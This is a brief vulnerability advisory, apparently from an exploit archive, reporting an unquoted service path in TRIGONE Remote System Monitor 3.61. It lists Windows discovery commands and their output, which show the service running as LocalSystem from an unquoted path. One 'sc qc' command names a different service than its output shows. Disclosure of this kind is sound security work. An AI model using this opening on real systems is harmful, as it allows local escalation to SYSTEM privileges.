TRIGONE Remote System Monitor 3.61 Unquoted Service Path

TRIGONE Remote System Monitor version 3.61 suffers from an unquoted service path vulnerability.


MD5 | 3463452fad0a27f3427cf59513fb07fc

# Exploit Title: TRIGONE Remote System Monitor 3.61 Unquoted Service Path
# Discovery by: Yehia Elghaly
# Date: 30-12-2021
# Vendor Homepage: https://www.trigonesoft.com/
# Software Link: https://www.trigonesoft.com/download/Remote_System_monitor_Server_3.61_x86_Setup.exe
# Tested Version: 3.61
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 7 x86 - Windows Server 2016 x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """

TRIGONE Remote System Monitor Server RemoteSystemMonitorService
C:\Program Files\TRIGONE\Remote System Monitor Server\RemoteSystemMonitorService.exe
Auto

C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: RemoteSystemMonitorService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\TRIGONE\Remote System Monitor Serv
er\RemoteSystemMonitorService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TRIGONE Remote System Monitor Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Related Posts